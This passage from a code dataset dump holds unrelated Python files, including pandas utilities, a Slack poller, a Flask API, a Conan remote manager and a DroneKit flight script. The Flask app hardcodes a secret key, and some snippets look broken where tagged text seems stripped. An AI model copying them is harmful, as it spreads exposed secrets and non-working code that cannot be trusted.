dest_dir, sort_format, rename_format, recursive=True,\n copy_files=False, test=False, remove_duplicates=True, day_begins=0,\n additional_groups_to_ignore=['File'], additional_tags_to_ignore=[],\n use_only_groups=None, use_only_tags=None, verbose=False)\n \nif __name__ == '__main__':\n main()\n","sub_path":"alexPhotoSort.py","file_name":"alexPhotoSort.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"395021075","text":"\"\"\"\nThe utils module contains helper functions.\n\"\"\"\nimport pandas as pd\nimport logging\n\nlogger = logging.getLogger(__name__)\n\ndef index_to_datetime(index, unit='s', origin='unix'):\n \"\"\"\n Convert DataFrame index from int/float to datetime,\n rounds datetime to the nearest millisecond\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in int or float \n \n unit : str (optional)\n Units of the original index\n \n origin : str\n Reference date used to define the starting time.\n If origin = 'unix', the start time is '1970-01-01 00:00:00'\n The origin can also be defined using a datetime string in a similar \n format (i.e. '2019-05-17 16:05:45')\n \n Returns\n ----------\n pandas Index\n DataFrame index in datetime\n \"\"\"\n \n index2 = pd.to_datetime(index, unit=unit, origin=origin)\n index2 = index2.round('ms') # round to nearest milliseconds\n \n return index2\n\ndef datetime_to_elapsedtime(index, origin=0.0):\n \"\"\"\n Convert DataFrame index from datetime to elapsed time in seconds\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in datetime\n \n origin : float\n Reference for elapsed time\n \n Returns\n ----------\n pandas Index\n DataFrame index in elapsed seconds\n \"\"\"\n\n index2 = index - index[0]\n index2 = index2.total_seconds() + origin\n \n return index2\n\ndef datetime_to_clocktime(index):\n \"\"\"\n Convert DataFrame index from datetime to clocktime (seconds past midnight)\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in datetime\n \n Returns\n ----------\n pandas Index\n DataFrame index in clocktime\n \"\"\"\n \n clocktime = index.hour*3600 + index.minute*60 + index.second + index.microsecond/1e6\n \n return clocktime\n \ndef datetime_to_epochtime(index):\n \"\"\"\n Convert DataFrame index from datetime to epoch time\n \n Parameters\n --------------\n index : pandas Index\n DataFrame index in datetime\n \n Returns\n ----------\n pandas Index\n DataFrame index in epoch time\n \"\"\"\n \n index2 = index.astype('int64')/10**9\n \n return index2\n\ndef round_index(index, frequency, how='nearest'):\n \"\"\"\n Round DataFrame index\n \n Parameters\n ----------\n index : pandas Index\n Datetime index\n \n frequency : int\n Expected time series frequency, in seconds\n \n how : string (optional)\n Method for rounding, default = 'nearest'. Options include:\n \n * nearest = round the index to the nearest frequency\n \n * floor = round the index to the smallest expected frequency\n \n * ceiling = round the index to the largest expected frequency \n \n Returns\n -------\n pandas Datarame\n Data with rounded datetime index\n \"\"\"\n\n window_str=str(int(frequency*1e3)) + 'ms' # milliseconds\n \n if how=='nearest':\n rounded_index = index.round(window_str)\n elif how=='floor':\n rounded_index = index.floor(window_str)\n elif how=='ceiling':\n rounded_index = index.ceil(window_str)\n else:\n logger.info(\"Invalid input, index not rounded\")\n rounded_index = index\n\n return rounded_index\n","sub_path":"pecos/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"385548982","text":"import logging\nfrom typing import *\n\nimport requests\n\nlog = logging.getLogger(__name__)\nAPI_URL = 'https://slack.com/api/chat.command'\nCOMMAND = '/poll'\n\n\ndef post_poll(options: List[str], slack_token: str, slack_channel: str):\n if not slack_token or not slack_channel:\n log.error('You need to provide --slack-token and --slack-channel '\n 'to send the menu to slack.')\n return\n\n log.debug(f'Posting poll with options: {options}')\n options_str = '\\n'.join(f'\"{o}\"' for o in (raw.replace('\"', '\\'') for raw in options))\n poll_text = f'''\"Kam na oběd?\" {options_str}'''\n\n log.debug(f'Slack-formatted message: {poll_text}')\n\n params = {\n 'data': API_URL,\n 'token': slack_token,\n 'channel': slack_channel,\n 'command': COMMAND,\n 'text': poll_text\n }\n requests.post(API_URL, params=params)\n","sub_path":"prglunch/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"388835605","text":"def currency_rates(currency):\n import requests\n import datetime\n currency = currency.upper()\n response = requests.get('http://www.cbr.ru/scripts/XML_daily.asp')\n content = response.content.decode(encoding=response.encoding)\n\n for el in content.split('')[1:]\n rate = rate[0].split('<')\n rate = float(rate[0].replace(',', '.'))\n if 'Date' in el:\n data = (el.split('Date=\"')[1]).split('\"')[0]\n data = data.split('.')\n date = datetime.datetime(year=int(data[2]), month=int(data[1]), day=int(data[0]))\n return rate, date","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"335418618","text":"import os\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\ndef cal_tempo_and_velocity_by_beat(features):\n tempos = []\n velocities = []\n prev_beat = 0\n\n tempo_saved = 0\n num_added = 0\n max_velocity = 0\n velocity_saved = 0\n momentum = 0.8\n for feat in features:\n if feat.qpm is None:\n continue\n cur_beat = feat.beat_index\n if cur_beat > prev_beat and num_added > 0:\n tempo = tempo_saved / num_added\n velocity = (velocity_saved / num_added + max_velocity) / 2\n\n if len(tempos)> 0:\n tempo = tempos[-1] * momentum + tempo * (1-momentum)\n velocity = velocities[-1] * momentum + velocity * (1 - momentum)\n tempos.append(tempo)\n velocities.append(velocity)\n tempo_saved = 0\n num_added = 0\n max_velocity = 0\n velocity_saved = 0\n\n\n tempo_saved += 10 ** feat.qpm\n velocity_saved += feat.velocity\n num_added += 1\n max_velocity = max(max_velocity, feat.velocity)\n prev_beat = cur_beat\n\n if num_added > 0:\n tempo = tempo_saved / num_added\n tempos.append(tempo)\n velocities.append(max_velocity)\n\n return tempos, velocities\n\n\n\ndef plot_performance_worm(features, save_name='images/performance_worm.png'):\n tempos, velocities = cal_tempo_and_velocity_by_beat(features)\n # data_points = []\n # num_data = len(tempos)\n #\n # for i in range(num_data):\n # data = [tempos[i], velocities[i]]\n # data_points.append(data)\n # plot data\n num_beat = len(tempos)\n plt.figure(figsize=(10, 7))\n for i in range(num_beat):\n ratio = i / num_beat\n plt.plot(tempos[i], velocities[i], markersize=(7 + 7*ratio), marker='o', color='green', alpha=0.05+ratio*0.8)\n if i > 0:\n plt.plot(tempos[i-1:i+1], velocities[i-1:i+1], color='green', alpha=0.05+ratio*0.8)\n plt.savefig(save_name)\n plt.close()\n","sub_path":"performanceWorm.py","file_name":"performanceWorm.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47084044","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 23 13:09:05 2017\n\n@author: jadelson\n\"\"\"\nsat = 'l8'\nbase_dir = '/scratch/jadelson/'\nworking_dir = './'\nprint('Initialization sat: ' + sat)\nif sat == 'l8':\n sat_keys = [ 'LAT', 'LON', 'RHOW_443', 'RHOW_483', 'RHOW_561', 'RHOW_655', 'RHOW_865'] #Landsat 8\n sat_test_key = 'RHOW_655'\n raw_sat_directory = base_dir + 'landsat_order/landsat8_convert/'\n wind_data_file = base_dir + 'weather_data/weather_data_2014-2017.dk'\n sat_start_date = 2014\nif sat == 'l7':\n sat_keys = [ 'LAT', 'LON', 'RHOW_479', 'RHOW_561', 'RHOW_661', 'RHOW_835'] #Landsat 7\n sat_test_key = 'RHOW_661'\n raw_sat_directory = base_dir + 'landsat_order/landsat7_convert/'\n wind_data_file = base_dir + 'weather_data/weather_data_2000-2017.dk'\n sat_start_date = 2000\n\n\nsat_tide_directory = base_dir + 'sat_and_rusty/'\nwind_sat_tide_directory = base_dir + 'wind_sat_and_rusty/'\nstress_sat_directory = base_dir + 'stress_sat/'\nfetch_file = sat + '_savedfetchmodel.dk'\nsat_filter_directory = base_dir + 'sat_on_mesh/'\n\n\n\n\n","sub_path":"init_builder.py","file_name":"init_builder.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"613068173","text":"from flask import Flask\nfrom flask_restful import Api\nfrom flask_jwt import JWT\n\nfrom security import authenticate, identity\n\nfrom resources.user import UserRegister, ViewAllUsers\nfrom resources.researchtopics import ResearchTopic, ResearchTopics, ResearchTopicID, ResearchTopicNew, ResearchTopicIDEdit, ResearchTopicsByUser\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATION'] = False\napp.secret_key = \"scgxXrAooDc9dQMQLkThoryc\"\napi = Api(app)\n\njwt = JWT(app, authenticate, identity) # /auth\n\n@app.route('/')\ndef index():\n return \"Hello world!\"\n\n@app.route(\"/list\")\ndef list():\n return render_template('list.html')\n\n# Research Topics APIs\napi.add_resource(ResearchTopic, '/research/')\napi.add_resource(ResearchTopics, '/research')\napi.add_resource(ResearchTopicID, '/research/id/')\napi.add_resource(ResearchTopicsByUser, '/research/user/')\napi.add_resource(ResearchTopicNew, '/research/new')\napi.add_resource(ResearchTopicIDEdit, '/research/id//update')\n\n# Manage User APIs\napi.add_resource(UserRegister, '/register')\napi.add_resource(ViewAllUsers, '/viewallusers')\n\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"72061922","text":"import os\nimport traceback\n\nimport shutil\nimport time\nfrom requests.exceptions import ConnectionError\n\nfrom conans import DEFAULT_REVISION_V1\nfrom conans.client.cache.remote_registry import Remote\nfrom conans.client.source import merge_directories\nfrom conans.errors import ConanConnectionError, ConanException, NotFoundException, \\\n NoRestV2Available, PackageNotFoundException\nfrom conans.paths import EXPORT_SOURCES_DIR_OLD, \\\n EXPORT_SOURCES_TGZ_NAME, EXPORT_TGZ_NAME, PACKAGE_TGZ_NAME, rm_conandir\nfrom conans.search.search import filter_packages\nfrom conans.util import progress_bar\nfrom conans.util.env_reader import get_env\nfrom conans.util.files import make_read_only, mkdir, rmdir, tar_extract, touch_folder\nfrom conans.util.log import logger\n# FIXME: Eventually, when all output is done, tracer functions should be moved to the recorder class\nfrom conans.util.tracer import (log_package_download,\n log_recipe_download, log_recipe_sources_download,\n log_uncompressed_file)\n\n\nclass RemoteManager(object):\n \"\"\" Will handle the remotes to get recipes, packages etc \"\"\"\n\n def __init__(self, cache, auth_manager, output, hook_manager):\n self._cache = cache\n self._output = output\n self._auth_manager = auth_manager\n self._hook_manager = hook_manager\n\n def check_credentials(self, remote):\n self._call_remote(remote, \"check_credentials\")\n\n def get_recipe_snapshot(self, ref, remote):\n assert ref.revision, \"get_recipe_snapshot requires revision\"\n return self._call_remote(remote, \"get_recipe_snapshot\", ref)\n\n def get_package_snapshot(self, pref, remote):\n assert pref.ref.revision, \"upload_package requires RREV\"\n assert pref.revision, \"get_package_snapshot requires PREV\"\n return self._call_remote(remote, \"get_package_snapshot\", pref)\n\n def upload_recipe(self, ref, files_to_upload, deleted, remote, retry, retry_wait):\n assert ref.revision, \"upload_recipe requires RREV\"\n self._call_remote(remote, \"upload_recipe\", ref, files_to_upload, deleted,\n retry, retry_wait)\n\n def upload_package(self, pref, files_to_upload, deleted, remote, retry, retry_wait):\n assert pref.ref.revision, \"upload_package requires RREV\"\n assert pref.revision, \"upload_package requires PREV\"\n self._call_remote(remote, \"upload_package\", pref,\n files_to_upload, deleted, retry, retry_wait)\n\n def get_recipe_manifest(self, ref, remote):\n ref = self._resolve_latest_ref(ref, remote)\n return self._call_remote(remote, \"get_recipe_manifest\", ref), ref\n\n def get_package_manifest(self, pref, remote):\n pref = self._resolve_latest_pref(pref, remote)\n return self._call_remote(remote, \"get_package_manifest\", pref), pref\n\n def get_package_info(self, pref, remote):\n \"\"\" Read a package ConanInfo from remote\n \"\"\"\n pref = self._resolve_latest_pref(pref, remote)\n return self._call_remote(remote, \"get_package_info\", pref), pref\n\n def get_recipe(self, ref, remote):\n \"\"\"\n Read the conans from remotes\n Will iterate the remotes to find the conans unless remote was specified\n\n returns (dict relative_filepath:abs_path , remote_name)\"\"\"\n\n self._hook_manager.execute(\"pre_download_recipe\", reference=ref, remote=remote)\n dest_folder = self._cache.package_layout(ref).export()\n rmdir(dest_folder)\n\n ref = self._resolve_latest_ref(ref, remote)\n\n t1 = time.time()\n zipped_files = self._call_remote(remote, \"get_recipe\", ref, dest_folder)\n duration = time.time() - t1\n log_recipe_download(ref, duration, remote.name, zipped_files)\n\n unzip_and_get_files(zipped_files, dest_folder, EXPORT_TGZ_NAME, output=self._output)\n # Make sure that the source dir is deleted\n package_layout = self._cache.package_layout(ref)\n rm_conandir(package_layout.source())\n touch_folder(dest_folder)\n conanfile_path = package_layout.conanfile()\n\n with package_layout.update_metadata() as metadata:\n metadata.recipe.revision = ref.revision\n\n self._hook_manager.execute(\"post_download_recipe\", conanfile_path=conanfile_path,\n reference=ref, remote=remote)\n\n return ref\n\n def get_recipe_sources(self, ref, export_folder, export_sources_folder, remote):\n assert ref.revision, \"get_recipe_sources requires RREV\"\n t1 = time.time()\n\n zipped_files = self._call_remote(remote, \"get_recipe_sources\", ref, export_folder)\n if not zipped_files:\n mkdir(export_sources_folder) # create the folder even if no source files\n return\n\n duration = time.time() - t1\n log_recipe_sources_download(ref, duration, remote.name, zipped_files)\n\n unzip_and_get_files(zipped_files, export_sources_folder, EXPORT_SOURCES_TGZ_NAME,\n output=self._output)\n # REMOVE in Conan 2.0\n c_src_path = os.path.join(export_sources_folder, EXPORT_SOURCES_DIR_OLD)\n if os.path.exists(c_src_path):\n merge_directories(c_src_path, export_sources_folder)\n rmdir(c_src_path)\n touch_folder(export_sources_folder)\n\n def get_package(self, pref, dest_folder, remote, output, recorder):\n\n conanfile_path = self._cache.package_layout(pref.ref).conanfile()\n self._hook_manager.execute(\"pre_download_package\", conanfile_path=conanfile_path,\n reference=pref.ref, package_id=pref.id, remote=remote)\n output.info(\"Retrieving package %s from remote '%s' \" % (pref.id, remote.name))\n rm_conandir(dest_folder) # Remove first the destination folder\n t1 = time.time()\n try:\n pref = self._resolve_latest_pref(pref, remote)\n snapshot = self._call_remote(remote, \"get_package_snapshot\", pref)\n if not is_package_snapshot_complete(snapshot):\n raise PackageNotFoundException(pref)\n zipped_files = self._call_remote(remote, \"get_package\", pref, dest_folder)\n\n with self._cache.package_layout(pref.ref).update_metadata() as metadata:\n metadata.packages[pref.id].revision = pref.revision\n metadata.packages[pref.id].recipe_revision = pref.ref.revision\n\n duration = time.time() - t1\n log_package_download(pref, duration, remote, zipped_files)\n unzip_and_get_files(zipped_files, dest_folder, PACKAGE_TGZ_NAME, output=self._output)\n # Issue #214 https://github.com/conan-io/conan/issues/214\n touch_folder(dest_folder)\n if get_env(\"CONAN_READ_ONLY_CACHE\", False):\n make_read_only(dest_folder)\n recorder.package_downloaded(pref, remote.url)\n output.success('Package installed %s' % pref.id)\n except NotFoundException:\n raise PackageNotFoundException(pref)\n except BaseException as e:\n output.error(\"Exception while getting package: %s\" % str(pref.id))\n output.error(\"Exception: %s %s\" % (type(e), str(e)))\n try:\n output.warn(\"Trying to remove package folder: %s\" % dest_folder)\n rmdir(dest_folder)\n except OSError as e:\n raise ConanException(\"%s\\n\\nCouldn't remove folder '%s', might be busy or open. \"\n \"Close any app using it, and retry\" % (str(e), dest_folder))\n raise\n self._hook_manager.execute(\"post_download_package\", conanfile_path=conanfile_path,\n reference=pref.ref, package_id=pref.id, remote=remote)\n\n return pref\n\n def search_recipes(self, remote, pattern=None, ignorecase=True):\n \"\"\"\n Search exported conans information from remotes\n\n returns (dict str(ref): {packages_info}\"\"\"\n return self._call_remote(remote, \"search\", pattern, ignorecase)\n\n def search_packages(self, remote, ref, query):\n packages = self._call_remote(remote, \"search_packages\", ref, query)\n packages = filter_packages(query, packages)\n return packages\n\n def remove(self, ref, remote):\n \"\"\"\n Removed conans or packages from remote\n \"\"\"\n return self._call_remote(remote, \"remove\", ref)\n\n def remove_packages(self, ref, remove_ids, remote):\n \"\"\"\n Removed conans or packages from remote\n \"\"\"\n return self._call_remote(remote, \"remove_packages\", ref, remove_ids)\n\n def get_recipe_path(self, ref, path, remote):\n return self._call_remote(remote, \"get_recipe_path\", ref, path)\n\n def get_package_path(self, pref, path, remote):\n return self._call_remote(remote, \"get_package_path\", pref, path)\n\n def authenticate(self, remote, name, password):\n return self._call_remote(remote, 'authenticate', name, password)\n\n def get_recipe_revisions(self, ref, remote):\n return self._call_remote(remote, \"get_recipe_revisions\", ref)\n\n def get_package_revisions(self, pref, remote):\n revisions = self._call_remote(remote, \"get_package_revisions\", pref)\n return revisions\n\n def get_latest_recipe_revision(self, ref, remote):\n revision = self._call_remote(remote, \"get_latest_recipe_revision\", ref)\n return revision\n\n def get_latest_package_revision(self, pref, remote):\n revision = self._call_remote(remote, \"get_latest_package_revision\", pref)\n return revision\n\n def _resolve_latest_ref(self, ref, remote):\n if ref.revision is None:\n try:\n ref = self.get_latest_recipe_revision(ref, remote)\n except NoRestV2Available:\n ref = ref.copy_with_rev(DEFAULT_REVISION_V1)\n return ref\n\n def _resolve_latest_pref(self, pref, remote):\n if pref.revision is None:\n try:\n pref = self.get_latest_package_revision(pref, remote)\n except NoRestV2Available:\n pref = pref.copy_with_revs(pref.ref.revision, DEFAULT_REVISION_V1)\n return pref\n\n def _call_remote(self, remote, method, *argc, **argv):\n assert(isinstance(remote, Remote))\n self._auth_manager.remote = remote\n try:\n return getattr(self._auth_manager, method)(*argc, **argv)\n except ConnectionError as exc:\n raise ConanConnectionError(\"%s\\n\\nUnable to connect to %s=%s\"\n % (str(exc), remote.name, remote.url))\n except ConanException as exc:\n exc.remote = remote\n raise\n except Exception as exc:\n logger.error(traceback.format_exc())\n raise ConanException(exc, remote=remote)\n\n\ndef is_package_snapshot_complete(snapshot):\n integrity = True\n for keyword in [\"conaninfo\", \"conanmanifest\", \"conan_package\"]:\n if not any(keyword in key for key in snapshot):\n integrity = False\n break\n return integrity\n\n\ndef check_compressed_files(tgz_name, files):\n bare_name = os.path.splitext(tgz_name)[0]\n for f in files:\n if f == tgz_name:\n continue\n if bare_name == os.path.splitext(f)[0]:\n raise ConanException(\"This Conan version is not prepared to handle '%s' file format. \"\n \"Please upgrade conan client.\" % f)\n\n\ndef unzip_and_get_files(files, destination_dir, tgz_name, output):\n \"\"\"Moves all files from package_files, {relative_name: tmp_abs_path}\n to destination_dir, unzipping the \"tgz_name\" if found\"\"\"\n\n tgz_file = files.pop(tgz_name, None)\n check_compressed_files(tgz_name, files)\n if tgz_file:\n uncompress_file(tgz_file, destination_dir, output=output)\n os.remove(tgz_file)\n\n\ndef uncompress_file(src_path, dest_folder, output):\n t1 = time.time()\n try:\n with progress_bar.open_binary(src_path, desc=\"Decompressing %s\" % os.path.basename(src_path),\n output=output) as file_handler:\n tar_extract(file_handler, dest_folder)\n except Exception as e:\n error_msg = \"Error while downloading/extracting files to %s\\n%s\\n\" % (dest_folder, str(e))\n # try to remove the files\n try:\n if os.path.exists(dest_folder):\n shutil.rmtree(dest_folder)\n error_msg += \"Folder removed\"\n except Exception:\n error_msg += \"Folder not removed, files/package might be damaged, remove manually\"\n raise ConanException(error_msg)\n\n duration = time.time() - t1\n log_uncompressed_file(src_path, duration, dest_folder)\n","sub_path":"conans/client/remote_manager.py","file_name":"remote_manager.py","file_ext":"py","file_size_in_byte":12780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"252932818","text":"from dronekit import connect, VehicleMode,LocationGlobalRelative,APIException\nimport time\nimport socket\nimport exceptions\nimport math\nimport argparse\nfrom pymavlink import mavutil\n######FUNCTIONS#######\n#create vehicle object with arg of drone host on port 5760 or 14550\ndef connectMyCopter():\n parser = argparse.ArgumentParser(description='commands')\n parser.add_argument('--connect')\n args = parser.parse_args()\n connection_string = args.connect\n #use simulated drone if no args specified\n vehicle = connect(connection_string, wait_ready=True)\n return vehicle\n''' if not connection_string:\n import dronekit_sitl\n sitl = dronekit_sitl.start_default()\n connection_string = sitl.connection_string()\n vehicle = connect(connection_string, wait_ready=True)\n else:\n vehicle = connect('/dev/ttyUSB0', wait_ready=True, baud=57600)\n'''\n\n#preform preflight checks and fly to 95% of target height\ndef armAndTakeoff(targetHeight):\n #wait for vehicle to become armable\n while vehicle.is_armable!=True:\n print(\"Waiting for vehicle to become armable\")\n time.sleep(1)\n print(\"Vehicle now armable.\")\n\n #wait for vehicle to enter guided flight mode\n vehicle.mode = VehicleMode(\"GUIDED\")\n while vehicle.mode!=\"GUIDED\":\n print(\"Waiting for vehicle to enter GUIDED flight mode\")\n time.sleep(1)\n print(\"Vehicle now in GUIDED MODE.\")\n\n #wait for vehicle to arm\n vehicle.armed = True\n while vehicle.armed == False:\n print(\"Waiting for vehicle to become armed\")\n time.sleep(1)\n print(\"CAUTION: PROPS SPINNING\")\n\n #takeoff to a height within 95% of target\n vehicle.simple_takeoff(targetHeight)\n while True:\n print(\"Current Altitude: %d\"%vehicle.location.global_relative_frame.alt)\n if vehicle.location.global_relative_frame.alt >= .95*targetHeight:\n break\n time.sleep(1)\n print(\"Target altitude of %d has been reached\"%targetHeight)\n return None\n\n#Land immediately\ndef land():\n vehicle.mode = VehicleMode(\"LAND\")\n while vehicle.mode != 'LAND':\n print(\"Waiting for drone to enter LAND mode\")\n time.sleep(1)\n print(\"Landing Drone\")\n while vehicle.location.global_relative_frame.alt > .5:\n print(\"Current Altitude: %d\"%vehicle.location.global_relative_frame.alt)\n time.sleep(2)\n print(\"Vehicle has landed\")\n return None\n\n#Send MavLink velocity command for 1 second with +x being the front of the drone\ndef send_local_velocity(vx, vy, vz):\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, 0, 0,\n mavutil.mavlink.MAV_FRAME_BODY_OFFSET_NED,\n 0b0000111111000111, #Bitmask for only velocities\n 0, 0, 0, #position\n vx, vy, vz, #velocity(NED+)\n 0, 0, 0, #Acceleration\n 0, 0)\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n#Send MavLink velocity command for 1 second with +x being the true North of Earth\ndef send_global_velocity(vx,vy, vz):\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, #Time to boot in ms\n 0, 0, #Target system, Target component\n mavutil.mavlink.MAV_FRAME_LOCAL_NED, #Frame\n 0b0000111111000111, #bitmask for velocity\n 0, 0, 0,#position\n vx, vy, vz,\n 0, 0, 0,#acceleration\n 0, 0) #Yaw, Yaw rate\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n\n#####Main Excecutable######\nvehicle = connectMyCopter()\nprint(\"Vehicle is connected\")\narmAndTakeoff(10)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(1, 0, 0)\n time.sleep(1)\n print(\"Moving North relative to drone\")\n count = count + 1\n\ntime.sleep(2)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(-1, 0, 0)\n time.sleep(1)\n print(\"Moving South relative to drone\")\n count = count + 1\n\ntime.sleep(2)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(0, 1, 0)\n time.sleep(1)\n print(\"Moving East relative to drone\")\n count = count + 1\n\ntime.sleep(2)\n\ncount = 0\nwhile count < 5:\n send_local_velocity(0, -1, 0)\n time.sleep(1)\n print(\"Moving West relative to drone\")\n count = count + 1\n\ntime.sleep(2)\n\nland()\n\ntime.sleep(30)\n\nvehicle.close()\n","sub_path":"velocity_based_mov.py","file_name":"velocity_based_mov.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"445683609","text":"import logging\n\nimport os\n\nfrom peek_platform.build_doc.DocBuilder import DocBuilder\nfrom peek_platform.build_frontend.NativescriptBuilder import NativescriptBuilder\nfrom peek_platform.build_frontend.WebBuilder import WebBuilder\n\nlogger = logging.getLogger(__name__)\n\n\nclass ClientFrontendBuildersMixin:\n\n def _buildMobile(self, loadedPlugins):\n # --------------------\n # Prepare the Peek Mobile\n\n from peek_platform import PeekPlatformConfig\n\n try:\n import peek_mobile\n mobileProjectDir = os.path.dirname(peek_mobile.__file__)\n\n except:\n logger.warning(\"Skipping builds of peek-mobile\"\n \", the package can not be imported\")\n return\n\n nsBuilder = NativescriptBuilder(mobileProjectDir,\n \"peek-mobile\",\n PeekPlatformConfig.config,\n loadedPlugins)\n yield nsBuilder.build()\n\n mobileWebBuilder = WebBuilder(mobileProjectDir,\n \"peek-mobile\",\n PeekPlatformConfig.config,\n loadedPlugins)\n yield mobileWebBuilder.build()\n\n def _buildDesktop(self, loadedPlugins):\n # --------------------\n # Prepare the Peek Desktop\n from peek_platform import PeekPlatformConfig\n\n try:\n import peek_desktop\n desktopProjectDir = os.path.dirname(peek_desktop.__file__)\n\n except:\n logger.warning(\"Skipping builds of peek-desktop\"\n \", the package can not be imported\")\n return\n\n desktopWebBuilder = WebBuilder(desktopProjectDir,\n \"peek-desktop\",\n PeekPlatformConfig.config,\n loadedPlugins)\n yield desktopWebBuilder.build()\n\n def _buildDocs(self, loadedPlugins):\n # --------------------\n # Prepare the User Docs\n from peek_platform import PeekPlatformConfig\n\n try:\n import peek_doc_user\n docProjectDir = os.path.dirname(peek_doc_user.__file__)\n\n except:\n logger.warning(\"Skipping builds of peek_doc_user\"\n \", the package can not be imported\")\n return\n\n docBuilder = DocBuilder(docProjectDir,\n \"peek-doc-user\",\n PeekPlatformConfig.config,\n loadedPlugins)\n yield docBuilder.build()\n","sub_path":"peek_client/plugin/ClientFrontendBuildersMixin.py","file_name":"ClientFrontendBuildersMixin.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"212584472","text":"import requests\nimport numpy as np\nimport datetime\nimport time\n\nclass MJPEGStreamer():\n \"\"\"\n Class for connecting to MJPEG network camera.\n \n `snap_img()` saves a single snapshot to disk.\n `stream_img()` displays MJPEG stream using opencv.\n\n Not async atm.\n \"\"\"\n\n def __init__(self, url):\n self.url = url\n\n def connect(self, snap=True):\n r = requests.get(self.url, stream=True)\n if(r.status_code == 200):\n bytes = b''\n for chunk in r.iter_content(chunk_size=1024):\n bytes += chunk\n a = bytes.find(b'\\xff\\xd8')\n b = bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = bytes[a:b+2]\n bytes = bytes[b+2:]\n if snap:\n path = self.save_img(jpg)\n break\n else:\n print(\"Received unexpected status code {}\".format(r.status_code))\n return path\n \n def snap_img(self):\n self.connect(snap=True)\n path = self.connect(snap=True)\n return path\n \n def return_image(self):\n path = self.connect(snap=True)\n return path\n\n def save_img(self, jpg):\n current_time = datetime.datetime.now()\n current_time, _ = str(current_time).replace(\":\",\"-\").split(\".\")\n current_time = current_time.replace(\" \", \"_\")\n file_name = f\"snapshot.jpeg\"\n path = \"website/static/snapshots/\"\n \n with open(path+file_name, mode=\"wb+\") as image:\n image.write(jpg)\n \n return file_name ","sub_path":"website/cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47038806","text":"import webbrowser\r\n\r\n\r\nclass Movie():\r\n \"\"\"This class provides a way to store movie related information.\r\n\r\n Attributes:\r\n movie_title: a string representing the movie title.\r\n movie_storyline: a astring representing the movies storyline.\r\n poster_image: a string representing a url to the movies poster image.\r\n youtube_trailer: a string representing a url to the movies youtube\r\n trailer.\r\n \"\"\"\r\n\r\n def __init__(self, movie_title, movie_storyline, poster_image,\r\n trailer_youtube):\r\n \"\"\"Inits Movie class with title, storyline, poster_image_url, and\r\n trailer_youtube_url.\"\"\"\r\n self.title = movie_title\r\n self.storyline = movie_storyline\r\n self.poster_image_url = poster_image\r\n self.trailer_youtube_url = trailer_youtube\r\n\r\n def show_trailer(self):\r\n \"\"\"Opens a webbrowser to the URL of the youtube movie trailer for the\r\n movie that called it.\"\"\"\r\n webbrowser.open(self.trailer_youtube_url)\r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"252424115","text":"allNum = []\nwhile True:\n numbers = str(input())\n split = numbers.split()\n inInt = list(map(int, split))\n if inInt[0] == inInt[1]:\n break\n allNum.append(inInt)\n\ndef check(i):\n if sorted(i) == i:\n print('Crescente')\n elif sorted(i) != i:\n print('Decrescente')\n\nfor i in range(len(allNum)):\n check(allNum[i])\n","sub_path":"1113_Ascending and Descending.py","file_name":"1113_Ascending and Descending.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"585048477","text":"\nclass Solution(object):\n def connect(self, root):\n \"\"\"\n @brief Class for solution.\n\n ACE\n 80 ms\n\n outloop processes levels\n inner loop process level from left to right\n \"\"\"\n node = root\n while node and node.left:\n head = node\n while node:\n node.left.next = node.right\n node.right.next = node.next.left if node.next else None\n node = node.next\n node = head.left\n\n\nif __name__ == '__main__':\n s = Solution()","sub_path":"116_populating_next_right_pointers_in_each_node.py","file_name":"116_populating_next_right_pointers_in_each_node.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"7592897","text":"'''\ncoding=utf-8\nTina 